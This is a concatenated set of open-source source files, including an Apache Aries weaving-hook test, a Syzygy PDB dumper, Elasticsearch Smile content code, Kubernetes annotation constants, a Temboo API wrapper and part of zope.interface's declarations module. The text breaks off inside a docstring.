try {
byte[] bytes = Streams.suck(res.openStream());
Class<?> cls = defineClass(name, bytes, 0, bytes.length);
loadedClasses.put(name, cls);
return cls;
} catch (Exception e) {
throw new ClassNotFoundException(name, e);
}
}
@Override
public URL findResource(String name) {
if (resources.contains(name)) {
return getClass().getClassLoader().getResource(prefix + name);
} else {
return super.findResource(name);
}
}
@Override
public Enumeration<URL> findResources(String name) throws IOException {
if (resources.contains(name)) {
return getClass().getClassLoader().getResources(prefix + name);
} else {
return super.findResources(name);
}
}
}
private static class MyWovenClass implements WovenClass {
byte [] bytes;
final String className;
final Bundle bundleContainingOriginalClass;
List<String> dynamicImports = new ArrayList<String>();
boolean weavingComplete = false;
private MyWovenClass(URL clazz, String name, Bundle bundle) throws Exception {
bytes = Streams.suck(clazz.openStream());
className = name;
bundleContainingOriginalClass = bundle;
}
@Override
public byte[] getBytes() {
return bytes;
}
@Override
public void setBytes(byte[] newBytes) {
bytes = newBytes;
}
@Override
public List<String> getDynamicImports() {
return dynamicImports;
}
@Override
public boolean isWeavingComplete() {
return weavingComplete;
}
@Override
public String getClassName() {
return className;
}
@Override
public ProtectionDomain getProtectionDomain() {
return null;
}
@Override
public Class<?> getDefinedClass() {
try {
weavingComplete = true;
return new MyWovenClassClassLoader(className, getBytes(), getClass().getClassLoader(), bundleContainingOriginalClass).loadClass(className);
} catch (ClassNotFoundException e) {
e.printStackTrace();
return null;
}
}
@Override
public BundleWiring getBundleWiring() {
BundleWiring bw = EasyMock.createMock(BundleWiring.class);
EasyMock.expect(bw.getBundle()).andReturn(bundleContainingOriginalClass);
EasyMock.expect(bw.getClassLoader()).andReturn(getClass().getClassLoader());
EasyMock.replay(bw);
return bw;
}
}
private static class MyWovenClassClassLoader extends ClassLoader implements BundleReference {
private final String className;
private final Bundle bundle;
private final byte [] bytes;
private Class<?> wovenClass;
public MyWovenClassClassLoader(String className, byte[] bytes, ClassLoader parent, Bundle bundle) {
super(parent);
this.className = className;
this.bundle = bundle;
this.bytes = bytes;
}
@Override
protected synchronized Class<?> loadClass(String name, boolean resolve)
throws ClassNotFoundException {
if (name.equals(className)) {
if (wovenClass == null)
wovenClass = defineClass(className, bytes, 0, bytes.length);
return wovenClass;
} else {
return super.loadClass(name, resolve);
}
}
@Override
public Class<?> loadClass(String name) throws ClassNotFoundException {
return loadClass(name, false);
}
@Override
public Bundle getBundle() {
return bundle;
}
}
}
| WouterBanckenACA/aries | spi-fly/spi-fly-dynamic-bundle/src/test/java/org/apache/aries/spifly/dynamic/ClientWeavingHookTest.java | Java | apache-2.0 | 45,645 |
// Copyright 2012 Google Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
#include "syzygy/experimental/pdb_dumper/pdb_module_info_stream_dumper.h"
#include "syzygy/common/align.h"
#include "syzygy/experimental/pdb_dumper/pdb_dump_util.h"
#include "syzygy/experimental/pdb_dumper/pdb_symbol_record_dumper.h"
#include "syzygy/pdb/pdb_dbi_stream.h"
#include "syzygy/pdb/pdb_stream.h"
#include "syzygy/pdb/pdb_symbol_record.h"
#include "syzygy/pe/cvinfo_ext.h"
namespace pdb {
namespace cci = Microsoft_Cci_Pdb;
namespace {
// Read the file checksum substream from a module info stream. The filenames
// used by this module will be stored in a map.
// @param file_names The map containing the filenames listed in the name stream
// of the PDB.
// @param stream The stream containing the checksum substream.
// @param length The length of the checksum substream.
// @param module_files The map where the filenames should be saved.
// @returns true on success, false on error.
bool ReadFileChecksums(const OffsetStringMap& file_names,
pdb::PdbStream* stream,
size_t length,
OffsetStringMap* module_files) {
DCHECK(stream != NULL);
DCHECK(module_files != NULL);
size_t base = stream->pos();
size_t end = base + length;
while (stream->pos() < end) {
cci::CV_FileCheckSum checksum = {};
size_t pos = stream->pos() - base;
if (!stream->Read(&checksum, 1)) {
LOG(ERROR) << "Unable to read file checksum.";
return false;
}
OffsetStringMap::const_iterator it(file_names.find(checksum.name));
if (it == file_names.end()) {
LOG(ERROR) << "There is a checksum reference for a file that is not in "
<< "the list of files used by this module.";
return false;
}
module_files->insert(std::make_pair(pos, it->second));
// Skip the checksum and align.
if (!stream->Seek(common::AlignUp(stream->pos() + checksum.len, 4))) {
LOG(ERROR) << "Unable to seek past file checksum.";
return false;
}
}
return true;
}
// Dump the line information from a line information substream.
// @param file_names The map containing the filenames used by this module.
// @param out The output where the data should be dumped.
// @param stream The stream containing the line information.
// @param length The length of the line information substream.
// @param indent_level The indentation level to use.
// @returns true on success, false on error.
bool DumpLineInfo(const OffsetStringMap& file_names,
FILE* out,
PdbStream* stream,
size_t length,
uint8 indent_level) {
DCHECK(stream != NULL);
size_t base = stream->pos();
// Read the header.
cci::CV_LineSection line_section = {};
if (!stream->Read(&line_section, 1)) {
LOG(ERROR) << "Unable to read line section.";
return false;
}
size_t end = base + length;
while (stream->pos() < end) {
cci::CV_SourceFile source_file = {};
if (!stream->Read(&source_file, 1)) {
LOG(ERROR) << "Unable to read source info.";
return false;
}
std::vector<cci::CV_Line> lines(source_file.count);
if (lines.size() && !stream->Read(&lines, lines.size())) {
LOG(ERROR) << "Unable to read line records.";
return false;
}
std::vector<cci::CV_Column> columns(source_file.count);
if ((line_section.flags & cci::CV_LINES_HAVE_COLUMNS) != 0 &&
!stream->Read(&columns, columns.size())) {
LOG(ERROR) << "Unable to read column records.";
return false;
}
OffsetStringMap::const_iterator it(file_names.find(source_file.index));
if (it == file_names.end()) {
LOG(ERROR) << "Unable to find an index in the list of filenames used by "
<< "this module.";
return false;
}
DumpIndentedText(out,
indent_level,
"Section %d, offset 0x%04X.\n",
line_section.sec,
line_section.off);
for (size_t i = 0; i < lines.size(); ++i) {
if (columns[i].offColumnStart != 0) {
DumpIndentedText(out, indent_level,
"%s(%d, %d): line and column at %d:%04X.\n",
it->second.c_str(),
lines[i].flags & cci::linenumStart,
columns[i].offColumnStart,
line_section.sec,
line_section.off + lines[i].offset);
} else {
DumpIndentedText(out,
indent_level,
"%s(%d): line at %d:%04X.\n",
it->second.c_str(),
lines[i].flags & cci::linenumStart,
line_section.sec,
line_section.off + lines[i].offset);
}
}
}
return true;
}
// Dump the line information substream from a module info stream.
// @param name_map The map containing the filenames listed in the name stream of
// the PDB.
// @param out The output where the data should be dumped.
// @param stream The stream containing the line information.
// @param start The position where the line information start in the stream.
// @param lines_bytes The length of the line information substream.
// @param indent_level The level of indentation to use.
void DumpLines(const OffsetStringMap& name_map,
FILE* out,
pdb::PdbStream* stream,
size_t start,
size_t lines_bytes,
uint8 indent_level) {
DCHECK(stream != NULL);
if (lines_bytes == 0)
return;
if (!stream->Seek(start)) {
LOG(ERROR) << "Unable to seek to line info.";
return;
}
// The line information is arranged as a back-to-back run of {type, len}
// prefixed chunks. The types are DEBUG_S_FILECHKSMS and DEBUG_S_LINES.
// The first of these provides file names and a file content checksum, where
// each record is identified by its index into its chunk (excluding type
// and len).
size_t end = start + lines_bytes;
OffsetStringMap file_names;
while (stream->pos() < end) {
uint32 line_info_type = 0;
uint32 length = 0;
if (!stream->Read(&line_info_type, 1) || !stream->Read(&length, 1)) {
LOG(ERROR) << "Unable to read line info signature.";
return;
}
switch (line_info_type) {
case cci::DEBUG_S_FILECHKSMS:
if (!ReadFileChecksums(name_map, stream, length, &file_names))
return;
break;
case cci::DEBUG_S_LINES:
if (!DumpLineInfo(file_names, out, stream, length, indent_level))
return;
break;
default:
LOG(ERROR) << "Unsupported line information type " << line_info_type
<< ".";
return;
}
}
}
} // namespace
void DumpModuleInfoStream(const DbiModuleInfo& module_info,
const OffsetStringMap& name_table,
FILE* out,
PdbStream* stream) {
DCHECK(stream != NULL);
uint8 indent_level = 1;
DumpIndentedText(out,
indent_level,
"Module name: %s\n",
module_info.module_name().c_str());
DumpIndentedText(out,
indent_level,
"Object name: %s\n",
module_info.object_name().c_str());
uint32 type = 0;
if (!stream->Read(&type, 1) || type != cci::C13) {
LOG(ERROR) << "Unexpected symbol stream type " << type << ".";
return;
}
SymbolRecordVector symbols;
ReadSymbolRecord(stream,
module_info.module_info_base().symbol_bytes - sizeof(type),
&symbols);
DumpIndentedText(out, indent_level + 1, "Symbol records:\n");
DumpSymbolRecords(out, stream, symbols, indent_level + 2);
DumpIndentedText(out, indent_level + 1, "Lines:\n");
DumpLines(name_table,
out,
stream,
module_info.module_info_base().symbol_bytes,
module_info.module_info_base().lines_bytes,
indent_level + 2);
}
} // namespace pdb
| wangming28/syzygy | syzygy/experimental/pdb_dumper/pdb_module_info_stream_dumper.cc | C++ | apache-2.0 | 8,662 |
/*
* Licensed to Elasticsearch under one or more contributor
* license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright
* ownership. Elasticsearch licenses this file to you under
* the Apache License, Version 2.0 (the "License"); you may
* not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.elasticsearch.common.xcontent.smile;
import com.fasterxml.jackson.core.JsonEncoding;
import com.fasterxml.jackson.core.JsonGenerator;
import com.fasterxml.jackson.dataformat.smile.SmileFactory;
import com.fasterxml.jackson.dataformat.smile.SmileGenerator;
import org.elasticsearch.common.bytes.BytesReference;
import org.elasticsearch.common.io.FastStringReader;
import org.elasticsearch.common.xcontent.XContent;
import org.elasticsearch.common.xcontent.XContentBuilder;
import org.elasticsearch.common.xcontent.XContentGenerator;
import org.elasticsearch.common.xcontent.XContentParser;
import org.elasticsearch.common.xcontent.XContentType;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.io.Reader;
/**
* A Smile based content implementation using Jackson.
*/
public class SmileXContent implements XContent {
public static XContentBuilder contentBuilder() throws IOException {
return XContentBuilder.builder(smileXContent);
}
final static SmileFactory smileFactory;
public final static SmileXContent smileXContent;
static {
smileFactory = new SmileFactory();
smileFactory.configure(SmileGenerator.Feature.ENCODE_BINARY_AS_7BIT, false); // for now, this is an overhead, might make sense for web sockets
smileFactory.configure(SmileFactory.Feature.FAIL_ON_SYMBOL_HASH_OVERFLOW, false); // this trips on many mappings now...
// Do not automatically close unclosed objects/arrays in com.fasterxml.jackson.dataformat.smile.SmileGenerator#close() method
smileFactory.configure(JsonGenerator.Feature.AUTO_CLOSE_JSON_CONTENT, false);
smileXContent = new SmileXContent();
}
private SmileXContent() {
}
@Override
public XContentType type() {
return XContentType.SMILE;
}
@Override
public byte streamSeparator() {
return (byte) 0xFF;
}
@Override
public XContentGenerator createGenerator(OutputStream os, String[] filters, boolean inclusive) throws IOException {
return new SmileXContentGenerator(smileFactory.createGenerator(os, JsonEncoding.UTF8), os, filters, inclusive);
}
@Override
public XContentParser createParser(String content) throws IOException {
return new SmileXContentParser(smileFactory.createParser(new FastStringReader(content)));
}
@Override
public XContentParser createParser(InputStream is) throws IOException {
return new SmileXContentParser(smileFactory.createParser(is));
}
@Override
public XContentParser createParser(byte[] data) throws IOException {
return new SmileXContentParser(smileFactory.createParser(data));
}
@Override
public XContentParser createParser(byte[] data, int offset, int length) throws IOException {
return new SmileXContentParser(smileFactory.createParser(data, offset, length));
}
@Override
public XContentParser createParser(BytesReference bytes) throws IOException {
if (bytes.hasArray()) {
return createParser(bytes.array(), bytes.arrayOffset(), bytes.length());
}
return createParser(bytes.streamInput());
}
@Override
public XContentParser createParser(Reader reader) throws IOException {
return new SmileXContentParser(smileFactory.createParser(reader));
}
}
| camilojd/elasticsearch | core/src/main/java/org/elasticsearch/common/xcontent/smile/SmileXContent.java | Java | apache-2.0 | 4,170 |
/*
Copyright 2017 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package api
const (
// MirrorAnnotationKey represents the annotation key set by kubelets when creating mirror pods
MirrorPodAnnotationKey string = "kubernetes.io/config.mirror"
// TolerationsAnnotationKey represents the key of tolerations data (json serialized)
// in the Annotations of a Pod.
TolerationsAnnotationKey string = "scheduler.alpha.kubernetes.io/tolerations"
// TaintsAnnotationKey represents the key of taints data (json serialized)
// in the Annotations of a Node.
TaintsAnnotationKey string = "scheduler.alpha.kubernetes.io/taints"
// SeccompPodAnnotationKey represents the key of a seccomp profile applied
// to all containers of a pod.
SeccompPodAnnotationKey string = "seccomp.security.alpha.kubernetes.io/pod"
// SeccompContainerAnnotationKeyPrefix represents the key of a seccomp profile applied
// to one container of a pod.
SeccompContainerAnnotationKeyPrefix string = "container.seccomp.security.alpha.kubernetes.io/"
// CreatedByAnnotation represents the key used to store the spec(json)
// used to create the resource.
CreatedByAnnotation = "kubernetes.io/created-by"
// PreferAvoidPodsAnnotationKey represents the key of preferAvoidPods data (json serialized)
// in the Annotations of a Node.
PreferAvoidPodsAnnotationKey string = "scheduler.alpha.kubernetes.io/preferAvoidPods"
// SysctlsPodAnnotationKey represents the key of sysctls which are set for the infrastructure
// container of a pod. The annotation value is a comma separated list of sysctl_name=value
// key-value pairs. Only a limited set of whitelisted and isolated sysctls is supported by
// the kubelet. Pods with other sysctls will fail to launch.
SysctlsPodAnnotationKey string = "security.alpha.kubernetes.io/sysctls"
// UnsafeSysctlsPodAnnotationKey represents the key of sysctls which are set for the infrastructure
// container of a pod. The annotation value is a comma separated list of sysctl_name=value
// key-value pairs. Unsafe sysctls must be explicitly enabled for a kubelet. They are properly
// namespaced to a pod or a container, but their isolation is usually unclear or weak. Their use
// is at-your-own-risk. Pods that attempt to set an unsafe sysctl that is not enabled for a kubelet
// will fail to launch.
UnsafeSysctlsPodAnnotationKey string = "security.alpha.kubernetes.io/unsafe-sysctls"
// ObjectTTLAnnotations represents a suggestion for kubelet for how long it can cache
// an object (e.g. secret, config map) before fetching it again from apiserver.
// This annotation can be attached to node.
ObjectTTLAnnotationKey string = "node.alpha.kubernetes.io/ttl"
// AffinityAnnotationKey represents the key of affinity data (json serialized)
// in the Annotations of a Pod.
// TODO: remove when alpha support for affinity is removed
AffinityAnnotationKey string = "scheduler.alpha.kubernetes.io/affinity"
// annotation key prefix used to identify non-convertible json paths.
NonConvertibleAnnotationPrefix = "non-convertible.kubernetes.io"
)
| danielromlein/dashboard | vendor/k8s.io/client-go/pkg/api/annotation_key_constants.go | GO | apache-2.0 | 3,584 |
# -*- coding: utf-8 -*-
###############################################################################
#
# FilterPlacesByTopLevelCategory
# Find places by top-level category and near specified latitude, longitude coordinates.
#
# Python versions 2.6, 2.7, 3.x
#
# Copyright 2014, Temboo Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
#
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class FilterPlacesByTopLevelCategory(Choreography):
def __init__(self, temboo_session):
"""
Create a new instance of the FilterPlacesByTopLevelCategory Choreo. A TembooSession object, containing a valid
set of Temboo credentials, must be supplied.
"""
super(FilterPlacesByTopLevelCategory, self).__init__(temboo_session, '/Library/Factual/FilterPlacesByTopLevelCategory')
def new_input_set(self):
return FilterPlacesByTopLevelCategoryInputSet()
def _make_result_set(self, result, path):
return FilterPlacesByTopLevelCategoryResultSet(result, path)
def _make_execution(self, session, exec_id, path):
return FilterPlacesByTopLevelCategoryChoreographyExecution(session, exec_id, path)
class FilterPlacesByTopLevelCategoryInputSet(InputSet):
"""
An InputSet with methods appropriate for specifying the inputs to the FilterPlacesByTopLevelCategory
Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
"""
def set_APIKey(self, value):
"""
Set the value of the APIKey input for this Choreo. ((optional, string) The API Key provided by Factual (AKA the OAuth Consumer Key).)
"""
super(FilterPlacesByTopLevelCategoryInputSet, self)._set_input('APIKey', value)
def set_APISecret(self, value):
"""
Set the value of the APISecret input for this Choreo. ((optional, string) The API Secret provided by Factual (AKA the OAuth Consumer Secret).)
"""
super(FilterPlacesByTopLevelCategoryInputSet, self)._set_input('APISecret', value)
def set_Category(self, value):
"""
Set the value of the Category input for this Choreo. ((required, string) Enter a Factual top-level category to narrow the search results. See Choreo doc for a list of Factual top-level categories.)
"""
super(FilterPlacesByTopLevelCategoryInputSet, self)._set_input('Category', value)
def set_Latitude(self, value):
"""
Set the value of the Latitude input for this Choreo. ((required, decimal) Enter latitude coordinates of the location defining the center of the search radius.)
"""
super(FilterPlacesByTopLevelCategoryInputSet, self)._set_input('Latitude', value)
def set_Longitude(self, value):
"""
Set the value of the Longitude input for this Choreo. ((required, decimal) Enter longitude coordinates of the location defining the center of the search radius.)
"""
super(FilterPlacesByTopLevelCategoryInputSet, self)._set_input('Longitude', value)
def set_Query(self, value):
"""
Set the value of the Query input for this Choreo. ((optional, string) A search string (i.e. Starbucks))
"""
super(FilterPlacesByTopLevelCategoryInputSet, self)._set_input('Query', value)
def set_Radius(self, value):
"""
Set the value of the Radius input for this Choreo. ((required, integer) Provide the radius (in meters, and centered on the latitude-longitude coordinates specified) for which search results will be returned.)
"""
super(FilterPlacesByTopLevelCategoryInputSet, self)._set_input('Radius', value)
class FilterPlacesByTopLevelCategoryResultSet(ResultSet):
"""
A ResultSet with methods tailored to the values returned by the FilterPlacesByTopLevelCategory Choreo.
The ResultSet object is used to retrieve the results of a Choreo execution.
"""
def getJSONFromString(self, str):
return json.loads(str)
def get_Response(self):
"""
Retrieve the value for the "Response" output from this Choreo execution. ((json) The response from Factual.)
"""
return self._output.get('Response', None)
class FilterPlacesByTopLevelCategoryChoreographyExecution(ChoreographyExecution):
def _make_result_set(self, response, path):
return FilterPlacesByTopLevelCategoryResultSet(response, path)
| jordanemedlock/psychtruths | temboo/core/Library/Factual/FilterPlacesByTopLevelCategory.py | Python | apache-2.0 | 5,132 |
/*
* Copyright 2004-2009 the original author or authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.compass.annotations.test.property;
import java.util.List;
import org.compass.annotations.Searchable;
import org.compass.annotations.SearchableId;
import org.compass.annotations.SearchableProperty;
/**
* @author kimchy
*/
@Searchable
public class A {
@SearchableId
long id;
@SearchableProperty
List<String> values;
}
| baboune/compass | src/main/test/org/compass/annotations/test/property/A.java | Java | apache-2.0 | 973 |
package main
import "github.com/mackerelio/mackerel-plugin-gearmand/lib"
func main() {
mpgearmand.Do()
}
| mackerelio/mackerel-agent-plugins | mackerel-plugin-gearmand/main.go | GO | apache-2.0 | 108 |
##############################################################################
# Copyright (c) 2003 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
##############################################################################
"""Implementation of interface declarations
There are three flavors of declarations:
- Declarations are used to simply name declared interfaces.
- ImplementsDeclarations are used to express the interfaces that a
class implements (that instances of the class provides).
Implements specifications support inheriting interfaces.
- ProvidesDeclarations are used to express interfaces directly
provided by objects.
"""
from __future__ import absolute_import
__docformat__ = 'restructuredtext'
import sys
from types import FunctionType
from types import MethodType
from types import ModuleType
import weakref
from . import advice as advicemod
from .interface import InterfaceClass
from .interface import SpecificationBase
from .interface import Specification
from ._compat import CLASS_TYPES as DescriptorAwareMetaClasses
from ._compat import PYTHON3
# Registry of class-implementation specifications
BuiltinImplementationSpecifications = {}
_ADVICE_ERROR = ('Class advice impossible in Python3. '
'Use the @%s class decorator instead.')
_ADVICE_WARNING = ('The %s API is deprecated, and will not work in Python3 '
'Use the @%s class decorator instead.')
class named(object):
def __init__(self, name):
self.name = name
def __call__(self, ob):
ob.__component_name__ = self.name
return ob
class Declaration(Specification):
"""Interface declarations"""
def __init__(self, *interfaces):
Specification.__init__(self, _normalizeargs(interfaces))
def changed(self, originally_changed):
Specification.changed(self, originally_changed)
try:
del self._v_attrs
except AttributeError:
pass
def __contains__(self, interface):
"""Test whether an interface is in the specification
"""
return self.extends(interface) and interface in self.interfaces()
def __iter__(self):
"""Return an iterator for the interfaces in the specification
"""
return self.interfaces()
def flattened(self):
"""Return an iterator of all included and extended interfaces
"""
return iter(self.__iro__)
def __sub__(self, other):
"""Remove interfaces from a specification
"""
return Declaration(
*[i for i in self.interfaces()
if not [j for j in other.interfaces()
if i.extends(j, 0)]
]
)
def __add__(self, other):
"""Add two specifications or a specification and an interface
"""
seen = {}
result = []
for i in self.interfaces():
seen[i] = 1
result.append(i)
for i in other.interfaces():
if i not in seen:
seen[i] = 1
result.append(i)
return Declaration(*result)
__radd__ = __add__
##############################################################################
#
# Implementation specifications
#
# These specify interfaces implemented by instances of classes
class Implements(Declaration):
# class whose specification should be used as additional base
inherit = None
# interfaces actually declared for a class
declared = ()
__name__ = '?'
@classmethod
def named(cls, name, *interfaces):
# Implementation method: Produce an Implements interface with
# a fully fleshed out __name__ before calling the constructor, which
# sets bases to the given interfaces and which may pass this object to
# other objects (e.g., to adjust dependents). If they're sorting or comparing
# by name, this needs to be set.
inst = cls.__new__(cls)
inst.__name__ = name
inst.__init__(*interfaces)
return inst
def __repr__(self):
return '<implementedBy %s>' % (self.__name__)
def __reduce__(self):
return implementedBy, (self.inherit, )
def __cmp(self, other):
# Yes, I did mean to name this __cmp, rather than __cmp__.
# It is a private method used by __lt__ and __gt__.
# This is based on, and compatible with, InterfaceClass.
# (The two must be mutually comparable to be able to work in e.g., BTrees.)
# Instances of this class generally don't have a __module__ other than
# `zope.interface.declarations`, whereas they *do* have a __name__ that is the
# fully qualified name of the object they are representing.
# Note, though, that equality and hashing are still identity based. This
# accounts for things like nested objects that have the same name (typically
# only in tests) and is consistent with pickling. As far as comparisons to InterfaceClass
# goes, we'll never have equal name and module to those, so we're still consistent there.
# Instances of this class are essentially intended to be unique and are
# heavily cached (note how our __reduce__ handles this) so having identity
# based hash and eq should also work.
if other is None:
return -1
n1 = (self.__name__, self.__module__)
n2 = (getattr(other, '__name__', ''), getattr(other, '__module__', ''))
# This spelling works under Python3, which doesn't have cmp().
return (n1 > n2) - (n1 < n2)
def __hash__(self):
return Declaration.__hash__(self)
# We want equality to be based on identity. However, we can't actually
# implement __eq__/__ne__ to do this because sometimes we get wrapped in a proxy.
# We need to let the proxy types implement these methods so they can handle unwrapping
# and then rely on: (1) the interpreter automatically changing `implements == proxy` into
# `proxy == implements` (which will call proxy.__eq__ to do the unwrapping) and then
# (2) the default equality semantics being identity based.
def __lt__(self, other):
c = self.__cmp(other)
return c < 0
def __le__(self, other):
c = self.__cmp(other)
return c <= 0
def __gt__(self, other):
c = self.__cmp(other)
return c > 0
def __ge__(self, other):
c = self.__cmp(other)
return c >= 0
def _implements_name(ob):
# Return the __name__ attribute to be used by its __implemented__
# property.
# This must be stable for the "same" object across processes
# because it is used for sorting. It needn't be unique, though, in cases
# like nested classes named Foo created by different functions, because
# equality and hashing is still based on identity.
# It might be nice to use __qualname__ on Python 3, but that would produce
# different values between Py2 and Py3.
return (getattr(ob, '__module__', '?') or '?') + \
'.' + (getattr(ob, '__name__', '?') or '?')
def implementedByFallback(cls):
"""Return the interfaces implemented for a class' instances
The value returned is an IDeclaration.
"""
try:
spec = cls.__dict__.get('__implemented__')
except AttributeError:
# we can't get the class dict. This is probably due to a
# security proxy. If this is the case, then probably no
# descriptor was installed for the class.
# We don't want to depend directly on zope.security in
# zope.interface, but we'll try to make reasonable
# accommodations in an indirect way.
# We'll check to see if there's an implements:
spec = getattr(cls, '__implemented__', None)
if spec is None:
# There's no spec stred in the class. Maybe its a builtin:
spec = BuiltinImplementationSpecifications.get(cls)
if spec is not None:
return spec
return _empty
if spec.__class__ == Implements:
# we defaulted to _empty or there was a spec. Good enough.
# Return it.
return spec
# TODO: need old style __implements__ compatibility?
# Hm, there's an __implemented__, but it's not a spec. Must be
# an old-style declaration. Just compute a spec for it
return Declaration(*_normalizeargs((spec, )))
if isinstance(spec, Implements):
return spec
if spec is None:
spec = BuiltinImplementationSpecifications.get(cls)
if spec is not None:
return spec
# TODO: need old style __implements__ compatibility?
spec_name = _implements_name(cls)
if spec is not None:
# old-style __implemented__ = foo declaration
spec = (spec, ) # tuplefy, as it might be just an int
spec = Implements.named(spec_name, *_normalizeargs(spec))
spec.inherit = None # old-style implies no inherit
del cls.__implemented__ # get rid of the old-style declaration
else:
try:
bases = cls.__bases__
except AttributeError:
if not callable(cls):
raise TypeError("ImplementedBy called for non-factory", cls)
bases = ()
spec = Implements.named(spec_name, *[implementedBy(c) for c in bases])
spec.inherit = cls
try:
cls.__implemented__ = spec
if not hasattr(cls, '__providedBy__'):
cls.__providedBy__ = objectSpecificationDescriptor
if (isinstance(cls, DescriptorAwareMetaClasses)
and
'__provides__' not in cls.__dict__):
# Make sure we get a __provides__ descriptor
cls.__provides__ = ClassProvides(
cls,
getattr(cls, '__class__', type(cls)),
)
except TypeError:
if not isinstance(cls, type):
raise TypeError("ImplementedBy called for non-type", cls)
BuiltinImplementationSpecifications[cls] = spec
return spec
implementedBy = implementedByFallback
def classImplementsOnly(cls, *interfaces):
"""Declare the only interfaces implemented by instances of a class
The arguments after the class are one or more interfaces or interface
specifications (``IDeclaration`` objects).
The interfaces given (including the interfaces in the specifications)
replace any previous declarations.
"""
spec = implementedBy(cls)
spec.declared = ()
spec.inherit = None
classImplements(cls, *interfaces)
def classImplements(cls, *interfaces):
"""Declare additional interfaces implemented for instances of a class
The arguments after the class are one or more interfaces or
interface specifications (``IDeclaration`` objects).
The interfaces given (including the interfaces in the specifications)
are added to any interfaces previously declared.
"""
spec = implementedBy(cls)
spec.declared += tuple(_normalizeargs(interfaces))
# compute the bases
bases = []
seen = {}
for b in spec.declared:
if b not in seen:
seen[b] = 1
bases.append(b)
if spec.inherit is not None:
for c in spec.inherit.__bases__:
b = implementedBy(c)
if b not in seen:
seen[b] = 1
bases.append(b)
spec.__bases__ = tuple(bases)
def _implements_advice(cls):
interfaces, classImplements = cls.__dict__['__implements_advice_data__']
del cls.__implements_advice_data__
classImplements(cls, *interfaces)
return cls
class implementer:
"""Declare the interfaces implemented by instances of a class.
This function is called as a class decorator.
The arguments are one or more interfaces or interface
specifications (IDeclaration objects).
The interfaces given (including the interfaces in the
specifications) are added to any interfaces previously
declared.
Previous declarations include declarations for base classes
unless implementsOnly was used.
This function is provided for convenience. It provides a more
convenient way to call classImplements. For example::
@implementer(I1)
class C(object):
pass
is equivalent to calling::
classImplements(C, I1)
after the class has been created.
"""
def __init__(self, *interfaces):
self.interfaces = interfaces
def __call__(self, ob):
if isinstance(ob, DescriptorAwareMetaClasses):
classImplements(ob, *self.interfaces)
return ob
spec_name = _implements_name(ob)
spec = Implements.named(spec_name, *self.interfaces)
try:
ob.__implemented__ = spec
except AttributeError:
raise TypeError("Can't declare implements", ob)
return ob
class implementer_only:
"""Declare the only interfaces implemented by instances of a class
This function is called as a class decorator.
The arguments are one or more interfaces or interface
specifications (IDeclaration objects).
Previous declarations including declarations for base classes
are overridden.
This function is provided for convenience. It provides a more
convenient way to call classImplementsOnly. For example::
@implementer_only(I1)
class C(object): pass
is equivalent to calling::
classImplementsOnly(I1)
after the class has been created.
"""
def __init__(self, *interfaces):
self.interfaces = interfaces
def __call__(self, ob):
if isinstance(ob, (FunctionType, MethodType)):
# XXX Does this decorator make sense for anything but classes?
# I don't think so. There can be no inheritance of interfaces
# on a method pr function....
raise ValueError('The implementer_only decorator is not '
'supported for methods or functions.')
else:
# Assume it's a class:
classImplementsOnly(ob, *self.interfaces)
return ob
def _implements(name, interfaces, classImplements):
# This entire approach is invalid under Py3K. Don't even try to fix
# the coverage for this block there. :(
frame = sys._getframe(2)
locals = frame.f_locals
# Try to make sure we were called from a class def. In 2.2.0 we can't
# check for __module__ since it doesn't seem to be added to the locals
# until later on.
if locals is frame.f_globals or '__module__' not in locals:
raise TypeError(name+" can be used only from a class definition.")
if '__implements_advice_data__' in locals:
raise TypeError(name+" can be used only once in a class definition.")
locals['__implements_advice_data__'] = interfaces, classImplements
advicemod.addClassAdvisor(_implements_advice, depth=3)
def implements(*interfaces):
"""Declare interfaces implemented by instances of a class
This function is called in a class definition.
The arguments are one or more interfaces or interface
specifications (IDeclaration objects).
The interfaces given (including the interfaces in the
specifications) are added to any interfaces previously
declared.
Previous declarations include declarations for base classes
